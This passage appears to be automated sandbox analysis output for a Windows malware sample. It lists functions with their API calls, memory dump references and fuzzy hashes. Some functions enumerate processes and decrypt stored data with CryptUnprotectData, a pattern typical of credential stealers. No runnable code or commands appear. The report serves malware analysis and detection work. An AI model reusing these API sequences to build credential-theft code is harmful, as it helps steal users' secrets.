                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7oI_$Y(oW$E~7$IJ
                                  • API String ID: 0-2242687573
                                  • Opcode ID: 2cc6f228f57f65656f2e22f9f6729796fd4611ea1dee8452213fa37f92a569cf
                                  • Instruction ID: 8d8586c3c6b668ec0b3f0bfa3a52b413cd1b5d233f478d62611a02be7a7c72e0
                                  • Opcode Fuzzy Hash: 2cc6f228f57f65656f2e22f9f6729796fd4611ea1dee8452213fa37f92a569cf
                                  • Instruction Fuzzy Hash: BD92F8F3A082109FE3046E2DEC8567AB7E9EF94720F1A893DEAC4C7744E93558058796
                                  Function 002D3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002D3A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D3AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D3ABF
                                    • Part of subcall function 002D7310: lstrlen.KERNEL32(------,002B5BEB), ref: 002D731B
                                    • Part of subcall function 002D7310: lstrcpy.KERNEL32(00000000), ref: 002D733F
                                    • Part of subcall function 002D7310: lstrcat.KERNEL32(?,------), ref: 002D7349
                                    • Part of subcall function 002D7280: lstrcpy.KERNEL32(00000000), ref: 002D72AE
                                  • CloseHandle.KERNEL32(00000000), ref: 002D3BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 13d9bfd582bc46125236a91b015cb715b22e17d4ffa85ccb1de56921cab63ad5
                                  • Instruction ID: b84c2fbc8a22751a41daeff6e1098edc170aeb54a6c21611b7a00843cd4dd54c
                                  • Opcode Fuzzy Hash: 13d9bfd582bc46125236a91b015cb715b22e17d4ffa85ccb1de56921cab63ad5
                                  • Instruction Fuzzy Hash: 90810431921206CFD718CF18D888B95B7F1FB44328F29C1AAD4089B3A2D7769D92CF81
                                  Function 002BEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 002BEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 002BEA7E
                                  • lstrcat.KERNEL32(002DCFEC,002DCFEC), ref: 002BEB27
                                  • lstrcat.KERNEL32(002DCFEC,002DCFEC), ref: 002BEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: a82d5cded1cf0883128f9776e31df46fc7305246b70e61d686d637f933049719
                                  • Instruction ID: cf3cb24d525568b86aab2530e934208f1113a249ccab21e0ce70ce77d82b3d8a
                                  • Opcode Fuzzy Hash: a82d5cded1cf0883128f9776e31df46fc7305246b70e61d686d637f933049719
                                  • Instruction Fuzzy Hash: 6F31E675A101196BDF108B58EC85FEEB77DAF44705F0040BAF90DE7281DBB05A14CBA6
                                  Function 002D40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 002D40CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 002D40DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D40E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 002D4113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: a6bed592b770fc1d4a542c0776f775fe4b15558d21d9bde16654a751184f0b2d
                                  • Instruction ID: 0abae1cea023fb4e621c509aca79a9fca900686e39c8b4cff8616af6bf2f2793
                                  • Opcode Fuzzy Hash: a6bed592b770fc1d4a542c0776f775fe4b15558d21d9bde16654a751184f0b2d
                                  • Instruction Fuzzy Hash: D9012C70600205BBDB14DFA5DC89BAABBADEF85311F108169FE09C7341EA71DD50CBA4
                                  Function 002B9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002B9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002B9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002B9B61
                                  • LocalFree.KERNEL32 ref: 002B9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 3b74b41e66b27acc30493f9454541db977cb95c81f3a4a06e0c02d120fec0dcd
                                  • Instruction ID: 3f23bc9f29cd2b824973e5ae2aabd18631cee812c5ba73e4361dd8193c867026
                                  • Opcode Fuzzy Hash: 3b74b41e66b27acc30493f9454541db977cb95c81f3a4a06e0c02d120fec0dcd
                                  • Instruction Fuzzy Hash: 51F012703503126BF7305F64AC45F967B98EF04B90F100514FA45EE2D1D7B59C50C654
                                  Function 0065A3FE Relevance: 5.0, Strings: 3, Instructions: 1247COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !/$MVW~$l;
                                  • API String ID: 0-4183770997
                                  • Opcode ID: 8b888a713722f011ceba54d561026405c1d32c9030bb9b893276f776bdfbcd1c
                                  • Instruction ID: cd3e8ecc50d0d9c8aaa2159e74c0962525d813c20963ac3bad349888db290d2e
                                  • Opcode Fuzzy Hash: 8b888a713722f011ceba54d561026405c1d32c9030bb9b893276f776bdfbcd1c
                                  • Instruction Fuzzy Hash: A98217F360C2049FE304AE2DEC8567AFBE9EF94320F1A853DEAC5C7744E63558058696
                                  Function 002CCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(002DB110,00000000,00000001,002DB100,?), ref: 002CCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 002CCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 002CCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: 10eb81fd725f57773fce6f294b0f60915cc725c0c07495203d31e8a390e4d3dc
                                  • Instruction ID: 922ecd3ed2aefd27823722537e71c48aff43c8a469ba4515ae4e3c3893914472
                                  • Opcode Fuzzy Hash: 10eb81fd725f57773fce6f294b0f60915cc725c0c07495203d31e8a390e4d3dc
                                  • Instruction Fuzzy Hash: 0C315871A50615BFD710DB94CC92FA977B9DB88B14F104298FA18EB2D0D7B0AD45CF90
                                  Function 002B9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002B9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B9BB3
                                  • LocalFree.KERNEL32(?), ref: 002B9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 21751b074b103eaf7e36af2dad0d3afd619364f1205a3b7783162122cd48bfe1
                                  • Instruction ID: 4c804caa9d548c3bf5ca2cd3fd2e7f7e2e38bcab7e7d93f3da04675186ece324
                                  • Opcode Fuzzy Hash: 21751b074b103eaf7e36af2dad0d3afd619364f1205a3b7783162122cd48bfe1
                                  • Instruction Fuzzy Hash: 920112B5E413096BE710DFA4DC45FAEB778EB44700F104568EA04AB281D7B49E1087D5
                                  Function 0055510D Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?q_9
                                  • API String ID: 0-3189373983
                                  • Opcode ID: 1e5651c4e2c9c438b8cbea94e58196c68e9ce5d443b1cb4e07ae9364b47d6417
                                  • Instruction ID: 83e96d98bd17d34e2e2bed51df6a74b9d0f465e136e73d0fc1dc40dac37c5bb1
                                  • Opcode Fuzzy Hash: 1e5651c4e2c9c438b8cbea94e58196c68e9ce5d443b1cb4e07ae9364b47d6417
                                  • Instruction Fuzzy Hash: 0A51F5F2908300AFE358AE38DC9573ABBE5EB94710F16883DE6C5C7784EA3448148757
                                  Function 005B8B78 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .V
                                  • API String ID: 0-2721548884
                                  • Opcode ID: 17a9c9db5ff30cd48e65303afa49d29ee3a950bde534758564512209e52aae0f
                                  • Instruction ID: 9863b31516fed680dc9b05f6c42a23a2362fa800210a4602466d4e2a57db232d
                                  • Opcode Fuzzy Hash: 17a9c9db5ff30cd48e65303afa49d29ee3a950bde534758564512209e52aae0f
                                  • Instruction Fuzzy Hash: 2C4117F3E182105BE308ED2CED957BAB7DADF94320F1A413D9A84C3784F975A9018686
                                  Function 0063FEC0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
